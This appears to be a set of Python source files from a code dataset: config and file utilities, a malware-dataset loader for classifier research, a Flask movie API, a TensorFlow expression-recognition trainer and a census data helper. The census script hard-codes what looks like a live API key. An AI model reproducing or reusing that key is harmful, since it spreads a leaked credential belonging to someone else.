indent=indent).strip() + '\\n'\n    if (fobj is sys.stdin) or (overwrite is False):\n        sys.stdout.write(new_str)\n        sys.stdout.flush()\n    else:\n        fobj.seek(0)\n        fobj.truncate()\n        fobj.write(new_str)\n","repo_name":"zmc/json_pretty","sub_path":"json_pretty/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"12457097605","text":"from pathlib import Path\n\nimport yaml\nfrom easydict import EasyDict as edict\n\n\ndef Config(filename):\n    listfile1 = open(filename, 'r')\n    listfile2 = open(filename, 'r')\n    cfg = edict(yaml.safe_load(listfile1))\n    # settings_show = listfile2.read().splitlines()\n\n    listfile1.close()\n    listfile2.close()\n\n    return cfg","repo_name":"wangxiyang2022/YONTD-MOT","sub_path":"mot/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"}
{"seq_id":"42942068680","text":"import logging\nfrom operator import index\nimport yaml\nimport json\nimport os\n\n\ndef read_yaml(path_of_yaml: str) -> dict:\n    with open(path_of_yaml) as yaml_file:\n        content = yaml.safe_load(yaml_file)\n    logging.info(f\"yaml files: {path_of_yaml} successfully loaded\")\n    return content\n\ndef create_directory(dirs: list):\n    for dir_path in dirs:\n        os.makedirs(dir_path,exist_ok =True)\n        logging.info(f\"reports are saved at {dir_path}\")\n\n\ndef save_local_df(data,data_path, index_status = False):\n    data.to_csv(data_path,index = index_status)\n    logging.info(f\"reports are saved at {data_path}\")\n\ndef save_reports(reports: dict, report_path: str, indentation=4):\n    with open (report_path ,'w') as f:\n        json.dump(reports,f,indent = indentation)\n    logging.info(f\"reports are saved at 
{report_path}\")","repo_name":"mdsaifk/dvc_dL","sub_path":"src/utils/all_utils.py","file_name":"all_utils.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21048460115","text":"from .malware import MalwareFolder\nfrom .utils import BinaryLoader\n\nfrom typing import Callable, Optional, Tuple\n\n\nclass RawPE(MalwareFolder):\n    def __init__(\n        self,\n        root: str,\n        extensions: Optional[Tuple[str, ...]] = None,\n        transform: Optional[Callable] = None, \n        target_transform: Optional[Callable] = None, \n        transforms: Optional[Callable] = None,\n        is_valid_file: Optional[Callable[[str], bool]] = None,\n    ) -> None:\n        if extensions is None and is_valid_file is None:\n            extensions = (\".exe\", \".dll\")\n        super().__init__(\n            root,\n            BinaryLoader(),\n            extensions=extensions,\n            transform=transform,\n            target_transform=target_transform,\n            transforms=transforms,\n            is_valid_file=is_valid_file,\n        )\n\n","repo_name":"Dovermore/randomized-deletion","sub_path":"src/torchmalware/datasets/raw_pe.py","file_name":"raw_pe.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"23044582531","text":"# Ordinary, non-sensitive parameters only; do not put passwords or other secrets here\n# State Grid (95598) official website\nLOGIN_URL = \"https://www.95598.cn/osgweb/login\"\nELECTRIC_USAGE_URL = \"https://www.95598.cn/osgweb/electricityCharge\"\nBALANCE_URL = \"https://www.95598.cn/osgweb/userAcc\"\n\n\n# Home Assistant\nSUPERVISOR_URL = \"http://supervisor/core\"\nAPI_PATH = \"/api/states/\" # https://developers.home-assistant.io/docs/api/rest/\n\nBALANCE_SENSOR_NAME = \"sensor.electricity_charge_balance\"\nDAILY_USAGE_SENSOR_NAME = \"sensor.last_electricity_usage\"\nYEARLY_USAGE_SENSOR_NAME = \"sensor.yearly_electricity_usage\"\nYEARLY_CHARGE_SENESOR_NAME = \"sensor.yearly_electricity_charge\"\nBALANCE_UNIT = \"CNY\"\nUSAGE_UNIT = \"kWh\"\n\n","repo_name":"Bpazy/sgcc_electricity","sub_path":"scripts/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22284318591","text":"from dags.dbo.oracle_market_data_model import AIndexDescription\nfrom dags.dbo.oracle_market_data_model import Oracle_Session\nfrom terminal import Logging\n\nlogger = Logging.getLogger(__name__)\n\n\nclass OracleAIndexDescriptionRepo:\n\n    @staticmethod\n    def get_all_a_index_description():\n        \"\"\"\n        Full (non-incremental) query\n        :return:\n        \"\"\"\n        logger.info('Start fetching data from the a_index_description table')\n        oracle_session = Oracle_Session()\n        a_index_descriptions = oracle_session.query(AIndexDescription).all()\n        oracle_session.close()\n\n        if a_index_descriptions is None or len(a_index_descriptions) == 0:\n            logger.info('No data found in the a_index_description table')\n            return []\n\n        logger.info('Queried %d rows from the a_index_description table' %\n                    (len(a_index_descriptions)))\n\n        return a_index_descriptions\n\n","repo_name":"zhanrendong/jkzx1","sub_path":"scripts/airflow/dags/dao/oracle_a_index_description_repo.py","file_name":"oracle_a_index_description_repo.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24303090958","text":"from flask import Flask, jsonify\n\napp = Flask(__name__)\n\nmovies = [\n\t{\"id\": 1, \"name\": \"Phantom Menace\"},\n\t{\"id\": 2, \"name\": \"Attack of the Clones\"},\n\t{\"id\": 3, \"name\": \"Revenge of the Sith\"}\n]\n\n@app.route('/movies/<int:id>', methods=[\"GET\"])\ndef get_movie(id):\n\tfor movie in movies:\n\t\tif movie[\"id\"] == id:\n\t\t\treturn jsonify(movie), 200\n\treturn jsonify({\"message\": \"Not Found\"}), 404\n\n@app.route('/movies', methods=[\"GET\"])\ndef get_movies():\n\treturn jsonify(movies), 200\n
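\n# Hypothetical smoke test once the server is running (added commentary, not part\n# of the original file):\n#   curl http://localhost:5000/movies/1   -> 200 with the first movie\n#   curl http://localhost:5000/movies/9   -> 404 with {\"message\": \"Not Found\"}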
\nif __name__ == \"__main__\":\n    app.run(debug=True, host='0.0.0.0', port=5000)\n","repo_name":"Yo-mah-Ya/kubernetes","sub_path":"nginx-flask/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"14859084691","text":"from sbxmap import *\r\nimport tifffile as tif\r\nimport os\r\n\r\ndef averageFrames(directory,file,channel,plane):\r\n\tanimal_dir = directory\r\n\tos.chdir(animal_dir)\r\n\r\n\td_sbx = sbxmap(file)\r\n\r\n\tplane = d_sbx.data()[channel][plane]\r\n\r\n\tframes = plane.shape[0] // 10 # integer count of complete 10-frame blocks (np.floor returned a float, which cannot be used for slicing or reshape)\r\n\tplane = plane[:(frames*10)]\r\n\toutput = plane.reshape(frames,10,plane.shape[1],plane.shape[2]).mean(axis=1)\r\n\ttif.imsave('averaged_python.tif',output)\r\n\twith open('averaged_python.sbx', 'wb') as f: # binary mode for np.save\r\n\t\tnp.save(f, output, allow_pickle=False)\r\n\r\n","repo_name":"jzeitoun/scanbox-analysis","sub_path":"python/averageFrames.py","file_name":"averageFrames.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"20430252389","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport os.path\nimport os\nimport time\nimport sys\nimport random\nimport tensorflow as tf\nimport numpy as np\nimport importlib\nimport argparse\nimport framework\nimport lfw\nimport h5py\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.python.ops import data_flow_ops\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allocator_type = 'BFC'\n\ndef main(args):\n\tnetwork = importlib.import_module(args.model_def)\n\tsubdir = datetime.strftime(datetime.now(), '%Y%m%d-%H%M%S')\n\tlog_dir = os.path.join(os.path.expanduser(args.logs_base_dir), subdir)\n\tif not os.path.isdir(log_dir): # Create the log directory if it doesn't exist\n\t\tos.makedirs(log_dir)\n\tmodel_dir = os.path.join(os.path.expanduser(args.models_base_dir), subdir)\n\tif not os.path.isdir(model_dir): # Create the model directory if it doesn't exist\n\t\tos.makedirs(model_dir)\n\t\t\n\tnp.random.seed(seed=args.seed)\n\trandom.seed(args.seed)\n\ttrain_set = framework.get_dataset(args.data_dir)\n\tnrof_classes = len(train_set)\n\tprint('Model directory: %s' % model_dir)\n\tprint('Log directory: %s' % log_dir)\n \n\tpretrained_model = None\n\tif args.pretrained_model:\n\t\tpretrained_model = os.path.expanduser(args.pretrained_model)\n\t\tprint('Pre-trained model: %s' % pretrained_model)\n\n\twith tf.Graph().as_default():\n\t\ttf.set_random_seed(args.seed)\n\t\tglobal_step = tf.Variable(0, trainable=False)\n \n    # Get a list of image paths and their labels\n\t\timage_list, label_list = framework.get_image_paths_and_labels(train_set)\n\t\tassert len(image_list)>0, 'The dataset should not be empty'\n \n    # Create a queue that produces indices into the image_list and label_list \n\t\tlabels = ops.convert_to_tensor(label_list, dtype=tf.int32)\n\t\trange_size = array_ops.shape(labels)[0]\n\t\tindex_queue = tf.train.range_input_producer(range_size, num_epochs=None,\n  
shuffle=True, seed=None, capacity=32)\n \n\t\tindex_dequeue_op = index_queue.dequeue_many(args.batch_size*args.epoch_size, 'index_dequeue')\n \n\t\tlearning_rate_placeholder = tf.placeholder(tf.float32, name='learning_rate')\n\n\t\tbatch_size_placeholder = tf.placeholder(tf.int32, name='batch_size')\n \n\t\tphase_train_placeholder = tf.placeholder(tf.bool, name='phase_train')\n \n\t\timage_paths_placeholder = tf.placeholder(tf.string, shape=(None,1), name='image_paths')\n\n\t\tlabels_placeholder = tf.placeholder(tf.int64, shape=(None,1), name='labels')\n \n\t\tinput_queue = data_flow_ops.FIFOQueue(capacity=100000,\n dtypes=[tf.string, tf.int64],\n shapes=[(1,), (1,)],\n shared_name=None, name=None)\n\t\tenqueue_op = input_queue.enqueue_many([image_paths_placeholder, labels_placeholder], name='enqueue_op')\n\n\t\tnrof_preprocess_threads = 4\n\t\timages_and_labels = []\n\t\tfor _ in range(nrof_preprocess_threads):\n\t\t\tfilenames, label = input_queue.dequeue()\n\t\t\timages = []\n\t\t\tfor filename in tf.unstack(filenames):\n\t\t\t\tfile_contents = tf.read_file(filename)\n\t\t\t\timage = tf.image.decode_image(file_contents,channels=3)\n\t\t\t\tif args.random_rotate:\n\t\t\t\t\timage = tf.py_func(framework.random_rotate_image, [image], tf.uint8)\n\t\t\t\tif args.random_crop:\n\t\t\t\t\timage = tf.random_crop(image, [args.image_size, args.image_size, 3])\n\t\t\t\telse:\n\t\t\t\t\timage = tf.image.resize_image_with_crop_or_pad(image, args.image_size, args.image_size)\n\t\t\t\tif args.random_flip:\n\t\t\t\t\timage = tf.image.random_flip_left_right(image)\n \n #pylint: disable=no-member\n\t\t\t\timage.set_shape((args.image_size, args.image_size, 3))\n\t\t\t\timages.append(tf.image.per_image_standardization(image))\n\t\t\timages_and_labels.append([images, label])\n\n\t\timage_batch, label_batch = tf.train.batch_join(\n\t\t\timages_and_labels, batch_size=batch_size_placeholder, \n\t\t\tshapes=[(args.image_size, args.image_size, 3), ()], enqueue_many=True,\n\t\t\tcapacity=4 * nrof_preprocess_threads * args.batch_size,\n\t\t\tallow_smaller_final_batch=True)\n\t\timage_batch = tf.reshape(image_batch,[args.batch_size,100,100,3])\n\t\timage_batch = tf.identity(image_batch, 'image_batch')\n\t\timage_batch = tf.identity(image_batch, 'input')\n\t\tlabel_batch = tf.identity(label_batch, 'label_batch')\n\t\tprint('Total number of classes: %d' % nrof_classes)\n\t\tprint('Total number of examples: %d' % len(image_list))\n\t\tprint('Building training graph')\n\t\tprelogits = network.inference(image_batch, args.keep_probability, \n\t\t\tphase_train=phase_train_placeholder, bottleneck_layer_size=args.embedding_size, \n\t\t\tweight_decay=args.weight_decay, batch_size=args.batch_size)\n\t\tlogits = slim.fully_connected(prelogits, len(train_set), activation_fn=None, \n weights_initializer=tf.truncated_normal_initializer(stddev=0.1), \n weights_regularizer=slim.l2_regularizer(args.weight_decay),\n scope='Logits', reuse=False)\n\t\tprint(logits.name)\n\t\tembeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n\n # Add center loss\n\t\tif args.center_loss_factor>0.0:\n\t\t\tprelogits_center_loss, _ = framework.center_loss(prelogits, label_batch, args.center_loss_alfa, nrof_classes)\n\t\t\ttf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, prelogits_center_loss * args.center_loss_factor)\n\n\t\tlearning_rate = tf.train.exponential_decay(learning_rate_placeholder, global_step,\n\t\t\targs.learning_rate_decay_epochs*args.epoch_size, args.learning_rate_decay_factor, 
staircase=True)\n\t\ttf.summary.scalar('learning_rate', learning_rate)\n\n # Calculate the average cross entropy loss across the batch\n\t\tcross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n\t\t\tlabels=label_batch, logits=logits, name='cross_entropy_per_example')\n\t\tcross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n\t\ttf.add_to_collection('losses', cross_entropy_mean)\n \n\n # Calculate the total losses\n\t\tregularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n\t\ttotal_loss = tf.add_n([cross_entropy_mean] + regularization_losses, name='total_loss')\n\n # Build a Graph that trains the model with one batch of examples and updates the model parameters\n\t\ttrain_op, redun = framework.trainspd(total_loss, global_step, args.optimizer, \n\t\t\tlearning_rate, args.moving_average_decay, tf.global_variables(), args.log_histograms)\n \n # Create a saver\n\t\tsaver = tf.train.Saver(tf.trainable_variables(), max_to_keep=3)\n\n # Build the summary operation based on the TF collection of Summaries.\n\t\tsummary_op = tf.summary.merge_all()\n\n # Start running operations on the Graph.\n\t\t#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)\n\t\tgpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)\n\t\tsess=tf.Session(config=config)\n\t\t#sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))\n\t\tsess.run(tf.global_variables_initializer())\n\t\tsess.run(tf.local_variables_initializer())\n\t\tsummary_writer = tf.summary.FileWriter(log_dir, sess.graph)\n\t\tcoord = tf.train.Coordinator()\n\t\ttf.train.start_queue_runners(coord=coord, sess=sess)\n\n\t\twith sess.as_default():\n\n\t\t\tif pretrained_model:\n\t\t\t\tprint('Restoring pretrained model: %s' % pretrained_model)\n\t\t\t\tsaver.restore(sess, pretrained_model)\n\n # Training and validation loop\n\t\t\tprint('Running training')\n\t\t\tepoch = 0\n\t\t\twhile epoch < args.max_nrof_epochs:\n\t\t\t\tstep = sess.run(global_step, feed_dict=None)\n\t\t\t\tepoch = step // args.epoch_size\n # Train for one epoch\n\t\t\t\ttrain(args, sess, epoch, image_list, label_list, index_dequeue_op, enqueue_op, image_paths_placeholder, labels_placeholder,\n\t\t\t\t\tlearning_rate_placeholder, phase_train_placeholder, batch_size_placeholder, global_step, \n\t\t\t\t\ttotal_loss, train_op, redun, summary_op, summary_writer, regularization_losses, args.learning_rate_schedule_file)\n\n # Save variables and the metagraph if it doesn't exist already\n\t\t\t\tsave_variables_and_metagraph(sess, saver, summary_writer, model_dir, subdir, step)\n\n\tsess.close()\n\treturn model_dir\n\n\ndef train(args, sess, epoch, image_list, label_list, index_dequeue_op, enqueue_op, image_paths_placeholder, labels_placeholder, \n\tlearning_rate_placeholder, phase_train_placeholder, batch_size_placeholder, global_step, \n\tloss, train_op, redun, summary_op, summary_writer, regularization_losses, learning_rate_schedule_file):\n\tbatch_number = 0\n\n\tif args.learning_rate>0.0:\n\t\tlr = args.learning_rate\n\telse:\n\t\tlr = framework.get_learning_rate_from_file(learning_rate_schedule_file, epoch)\n\n\tindex_epoch = sess.run(index_dequeue_op)\n\tlabel_epoch = np.array(label_list)[index_epoch]\n\timage_epoch = np.array(image_list)[index_epoch]\n \n # Enqueue one epoch of image paths and labels\n\tlabels_array = np.expand_dims(np.array(label_epoch),1)\n\timage_paths_array = 
np.expand_dims(np.array(image_epoch),1)\n\tsess.run(enqueue_op, {image_paths_placeholder: image_paths_array, labels_placeholder: labels_array})\n\n # Training loop\n\ttrain_time = 0\n\twhile batch_number < args.epoch_size:\n\t\tstart_time = time.time()\n\t\tfeed_dict = {learning_rate_placeholder: lr, phase_train_placeholder:True, batch_size_placeholder:args.batch_size}\n\t\tif (batch_number % 100 == 0):\n\t\t\terr, _, _, step, reg_loss, summary_str = sess.run([loss, train_op, redun, global_step, regularization_losses, summary_op], feed_dict=feed_dict)\n\t\t\tsummary_writer.add_summary(summary_str, global_step=step)\n\t\telse:\n\t\t\terr, _, _, step, reg_loss = sess.run([loss, train_op, redun, global_step, regularization_losses], feed_dict=feed_dict)\n\t\tduration = time.time() - start_time\n\t\tprint('Epoch: [%d][%d/%d]\\tTime %.3f\\tLoss %2.3f\\tRegLoss %2.3f' %\n\t\t\t(epoch, batch_number+1, args.epoch_size, duration, err, np.sum(reg_loss)))\n\t\tbatch_number += 1\n\t\ttrain_time += duration\n # Add validation loss and accuracy to summary\n\tsummary = tf.Summary()\n #pylint: disable=maybe-no-member\n\tsummary.value.add(tag='time/total', simple_value=train_time)\n\tsummary_writer.add_summary(summary, step)\n\treturn step\n\n\ndef save_variables_and_metagraph(sess, saver, summary_writer, model_dir, model_name, step):\n # Save the model checkpoint\n\tprint('Saving variables')\n\tstart_time = time.time()\n\tcheckpoint_path = os.path.join(model_dir, 'model-%s.ckpt' % model_name)\n\tsaver.save(sess, checkpoint_path, global_step=step, write_meta_graph=False)\n\tsave_time_variables = time.time() - start_time\n\tprint('Variables saved in %.2f seconds' % save_time_variables)\n\tmetagraph_filename = os.path.join(model_dir, 'model-%s.meta' % model_name)\n\tsave_time_metagraph = 0 \n\tif not os.path.exists(metagraph_filename):\n\t\tprint('Saving metagraph')\n\t\tstart_time = time.time()\n\t\tsaver.export_meta_graph(metagraph_filename)\n\t\tsave_time_metagraph = time.time() - start_time\n\t\tprint('Metagraph saved in %.2f seconds' % save_time_metagraph)\n\tsummary = tf.Summary()\n #pylint: disable=maybe-no-member\n\tsummary.value.add(tag='time/save_variables', simple_value=save_time_variables)\n\tsummary.value.add(tag='time/save_metagraph', simple_value=save_time_metagraph)\n\tsummary_writer.add_summary(summary, step)\n\ndef parse_arguments(argv):\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--logs_base_dir', type=str, \n\t\thelp='Directory where to write event logs.', default='~/logs/')\n\tparser.add_argument('--models_base_dir', type=str,\n help='Directory where to write trained models and checkpoints.', default='~/models/')\n\tparser.add_argument('--gpu_memory_fraction', type=float,\n help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)\n\tparser.add_argument('--pretrained_model', type=str,\n help='Load a pretrained model before training starts.')\n\tparser.add_argument('--data_dir', type=str,\n help='Path to the data directory containing aligned face patches. Multiple directories are separated with colon.',\n default='~/data/SFEW/Train')\n\tparser.add_argument('--model_def', type=str,\n help='Model definition. 
Points to a module containing the definition of the inference graph.', default='models.covpoolnet')\n\tparser.add_argument('--max_nrof_epochs', type=int,\n help='Number of epochs to run.', default=500)\n\tparser.add_argument('--batch_size', type=int,\n help='Number of images to process in a batch.', default=128)\n\tparser.add_argument('--image_size', type=int,\n help='Image size (height, width) in pixels.', default=100)\n\tparser.add_argument('--epoch_size', type=int,\n help='Number of batches per epoch.', default=1000)\n\tparser.add_argument('--embedding_size', type=int,\n help='Dimensionality of the embedding.', default=128)\n\tparser.add_argument('--random_crop', \n help='Performs random cropping of training images. If false, the center image_size pixels from the training images are used. ' +\n 'If the size of the images in the data directory is equal to image_size no cropping is performed', action='store_true')\n\tparser.add_argument('--random_flip', \n help='Performs random horizontal flipping of training images.', action='store_true')\n\tparser.add_argument('--random_rotate', \n help='Performs random rotations of training images.', action='store_true')\n\tparser.add_argument('--keep_probability', type=float,\n help='Keep probability of dropout for the fully connected layer(s).', default=1.0)\n\tparser.add_argument('--weight_decay', type=float,\n help='L2 weight regularization.', default=0.0)\n\tparser.add_argument('--decov_loss_factor', type=float,\n help='DeCov loss factor.', default=0.0)\n\tparser.add_argument('--center_loss_factor', type=float,\n help='Center loss factor.', default=0.0)\n\tparser.add_argument('--center_loss_alfa', type=float,\n help='Center update rate for center loss.', default=0.95)\n\tparser.add_argument('--optimizer', type=str, choices=['ADAGRAD', 'ADADELTA', 'ADAM', 'RMSPROP', 'MOM'],\n help='The optimization algorithm to use', default='ADAGRAD')\n\tparser.add_argument('--learning_rate', type=float,\n help='Initial learning rate. 
If set to a negative value a learning rate ' +\n                        'schedule can be specified in the file \"learning_rate_schedule.txt\"', default=0.1)\n\tparser.add_argument('--learning_rate_decay_epochs', type=int,\n                        help='Number of epochs between learning rate decay.', default=100)\n\tparser.add_argument('--learning_rate_decay_factor', type=float,\n                        help='Learning rate decay factor.', default=1.0)\n\tparser.add_argument('--moving_average_decay', type=float,\n                        help='Exponential decay for tracking of training parameters.', default=0.9999)\n\tparser.add_argument('--seed', type=int,\n                        help='Random seed.', default=666)\n\tparser.add_argument('--nrof_preprocess_threads', type=int,\n                        help='Number of preprocessing (data loading and augmentation) threads.', default=4)\n\tparser.add_argument('--log_histograms', \n                        help='Enables logging of weight/bias histograms in tensorboard.', action='store_true')\n\tparser.add_argument('--learning_rate_schedule_file', type=str,\n                        help='File containing the learning rate schedule that is used when learning_rate is set to -1.', default='data/learning_rate_schedule.txt')\n\treturn parser.parse_args(argv)\n \n\nif __name__ == '__main__':\n\tmain(parse_arguments(sys.argv[1:]))\n","repo_name":"d-acharya/CovPoolFER","sub_path":"conv_feature_pooling/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15433,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"37"}
{"seq_id":"11316548532","text":"from re import A\nfrom claseAparatoElectronico import AparatoElectronico\n\nclass Heladera(AparatoElectronico):\n    __capacidad_litros: float\n    __freezer: bool\n    __ciclica: bool\n\n    def __init__(self, **datos):\n        self._validar_flotante(datos['capacidad_litros'])\n        self._validar_booleano(datos['freezer'])\n        self._validar_booleano(datos['ciclica'])\n        \n        super().__init__(datos['marca'], datos['modelo'], datos['color'], datos['pais_fabricacion'], datos['precio_base'])\n        self.__capacidad_litros = datos['capacidad_litros']\n        self.__freezer = datos['freezer']\n        self.__ciclica = datos['ciclica']\n\n    def _validar_flotante(self, dato):\n        if type(dato) != float:\n            raise TypeError('Expected a floating point number (a real number)')\n\n    def _validar_booleano(self, dato):\n        if type(dato) != bool:\n            raise TypeError('Expected a Boolean')\n\n    def __str__(self):\n        return super().__str__() + 'Capacity (liters): {}\\nFreezer: {}\\nCyclic: {}\\nSale price: {}'.format(self.__capacidad_litros,\n                                                                                    self.__freezer,\n                                                                                    self.__ciclica,\n                                                                                    super().get_importe_venta())\n\n    def _calcular_porcentaje_adicional(self):\n        porcentaje = 0\n\n        if not self.__freezer: porcentaje += 1\n        else: porcentaje += 5\n\n        if self.__ciclica: porcentaje += 10\n\n        return porcentaje","repo_name":"manurdls/POO-Unidad-3","sub_path":"Ejercicio 6/claseHeladera.py","file_name":"claseHeladera.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"7510634151","text":"from utilities import categorize, mapping_household_marg_to_sample, mapping_person_marg_to_sample\nfrom censusHelper import Census\nimport re\nimport pandas as pd\n\n\nclass Dataset(object):\n    def __init__(self, base_url, key, pums_url, geo_url, year, variables, variables_p=None):\n\n        self.variables = variables\n        self.variables_p = variables_p\n        self.c = Census(key, base_url, year, pums_url, geo_url=geo_url)\n        self._CACHE = {}\n\n    def _to_columns(self, variables):\n\n        \"\"\"\n        Take a dictionary of tuples (cat, ACS cols)\n        :return: all ACS columns to be extracted\n        \"\"\"\n\n        col_list = []\n        for _, expr in variables.items():\n            col_list = col_list + re.findall(r\"[\\w]+\", expr)\n\n        return col_list\n
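\n    # Example (added for illustration; not part of the original file): with\n    #   variables = {(\"tenure\", \"own\"): \"B25038_002E + B25038_009E\"}\n    # _to_columns returns [\"B25038_002E\", \"B25038_009E\"].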
\n\n    @property\n    def h_marginal_acs(self):\n        \"\"\"\n        This function transforms the fields queried from the acs into\n        categories\n        :return: table with nrows=number of block group and ncolumns = number of category * number of sub categories\n        within each category\n        \"\"\"\n        block_group_columns = self._to_columns(self.variables)\n        df = self.c.query_block_group(block_group_columns)\n        df['GEOID'] = df['state'] + df['county'] + df['tract'] + df['block group']\n        cat_df = categorize(df, self.variables, index_cols=['GEOID'])\n\n        if self.variables_p is not None:\n            block_group_columns = self._to_columns(\n                self.variables_p)  # query acs persons level characteristics if necessary\n            df_p = self.c.query_block_group(block_group_columns)\n            df_p['GEOID'] = df_p['state'] + df_p['county'] + df_p['tract'] + df_p['block group']\n            cat_p = categorize(df_p, self.variables_p, index_cols=['GEOID'])\n            cat_df = cat_df.join(cat_p)\n\n        return cat_df\n\n    @property\n    def pums_h(self):\n        \"\"\"\n        :return: households sample from the pums\n        \"\"\"\n        if 'pums_h' not in self._CACHE:\n            pums_h = self.c.get_pums_h().set_index('SERIALNO')\n            self._CACHE['pums_h'] = pums_h\n\n        else:\n            pums_h = self._CACHE['pums_h']\n\n        return pums_h[pums_h.WGTP > 0]\n\n    @property\n    def pums_p(self):\n        \"\"\"\n        :return: person sample from the pums\n        \"\"\"\n        if 'pums_p' not in self._CACHE:\n            pums_p = self.c.get_pums_p().set_index(['SERIALNO', 'SPORDER'])\n            self._CACHE['pums_p'] = pums_p\n        else:\n            pums_p = self._CACHE['pums_p']\n        return pums_p\n\n    @property\n    def sample_df(self):\n\n        \"\"\"\n        This function converts the households sample into a table with category variables\n        The columns have the same name as the ones obtained from the ACS marginals\n        Variables are equal to one if and only if they belong to the category defined in the ACS table\n        The function also adds the characteristics from the individuals living in each household\n        Individual-level characteristics are properly adjusted to account for the ratio of individual weight\n        within the household\n        :return:\n        \"\"\"\n        sample_df = pd.DataFrame(index=self.pums_h.index)\n        cat = 
list(set(index[0] for index, _ in self.variables_p.items()))\n\n for index in cat: # create category from sample data\n sample[index] = self.pums_p.apply(mapping_person_marg_to_sample()[index], axis=1)\n sample = sample[sample[index] != '-99']\n\n df = pd.get_dummies(sample) # transform category into dummies\n W = self.pums_p['PWGTP']\n\n for v in df.columns:\n df[v] = df[v] * W # add individual weights\n\n df = df.reset_index().drop('SPORDER', axis=1)\n return df.groupby('SERIALNO').sum() # aggregate at the households levels\n\n\nif __name__ == \"__main__\":\n import numpy as np\n import os\n\n key = \"9d119de5f3de42bf4570723644941f4a4a707b8f\"\n base_url = 'https://api.census.gov/data/year/acs/acs5?get=NAME,variables&for=block%20group:*&in=in_field&key=your_key'\n geo_url = 'https://www2.census.gov/geo/docs/reference/codes/files/st08_co_cou.txt'\n pums_url = 'https://www2.census.gov/programs-surveys/acs/data/pums/year/5-Year/'\n\n eval_d = {\n\n (\"hhincome\", \"lt30\"):\n \"B19001_002E + B19001_003E + B19001_004E + \"\n \"B19001_005E + B19001_006E\",\n (\"hhincome\", \"gt30-lt60\"):\n \"B19001_007E + B19001_008E + B19001_009E + \"\n \"B19001_010E + B19001_011E\",\n (\"hhincome\", \"gt60-lt100\"): \"B19001_012E + B19001_013E\",\n (\"hhincome\", \"gt100-lt150\"): \"B19001_014E + B19001_015E\",\n (\"hhincome\", \"gt150\"): \"B19001_016E + B19001_017E\",\n\n (\"nhouseholds\", \"all\"): \"B19001_001E\",\n\n (\"tenure\", \"own\"): \"B25038_002E\",\n (\"tenure\", \"rent\"): \"B25038_009E\",\n\n (\"seniors\", \"yes\"): \"B11007_002E\",\n (\"seniors\", \"no\"): \"B11007_007E\",\n\n (\"children\", \"yes\"): \"B11005_002E\",\n (\"children\", \"no\"): \"B11005_011E\",\n\n (\"persons\", \"1 persons\"): \"B11016_010E\",\n (\"persons\", \"2 persons\"): \"B11016_003E + B11016_011E\",\n (\"persons\", \"3 persons\"): \"B11016_004E + B11016_012E\",\n (\"persons\", \"4 persons\"): \"B11016_005E + B11016_013E\",\n (\"persons\",\n \"5 persons or more\"): \"B11016_006E + B11016_014E + B11016_008E + B11016_016E + B11016_007E + B11016_015E\"\n\n }\n\n eval_p = {\n\n (\"sex\", \"male\"): \"B01001_002E * B11002_001E /B01001_001E\",\n (\"sex\", \"female\"): \"B01001_026E * B11002_001E /B01001_001E\",\n\n (\"age\", \"19 and under\"): \"(B01001_003E + B01001_004E + B01001_005E + \"\n \"B01001_006E + B01001_007E + B01001_027E + \"\n \"B01001_028E + B01001_029E + B01001_030E + \"\n \"B01001_031E)* B11002_001E / B01001_001E\",\n (\"age\", \"20 to 34\"): \"(B01001_008E + B01001_009E + B01001_010E + \"\n \"B01001_011E + B01001_012E + B01001_032E + \"\n \"B01001_033E + B01001_034E + B01001_035E + \"\n \"B01001_036E)* B11002_001E / B01001_001E\",\n (\"age\", \"35 to 59\"): \"(B01001_013E + B01001_014E + B01001_015E + \"\n \"B01001_016E + B01001_017E + B01001_037E + \"\n \"B01001_038E + B01001_039E + B01001_040E + \"\n \"B01001_041E)* B11002_001E / B01001_001E\",\n (\"age\", \"60 and above\"): \"(B01001_018E + B01001_019E + B01001_020E + \"\n \"B01001_021E + B01001_022E + B01001_023E + \"\n \"B01001_024E + B01001_025E + B01001_042E + \"\n \"B01001_043E + B01001_044E + B01001_045E + \"\n \"B01001_046E + B01001_047E + B01001_048E + \"\n \"B01001_049E)* B11002_001E /B01001_001E\",\n\n (\"grade\", \"PK\"): \"B14007_003E * 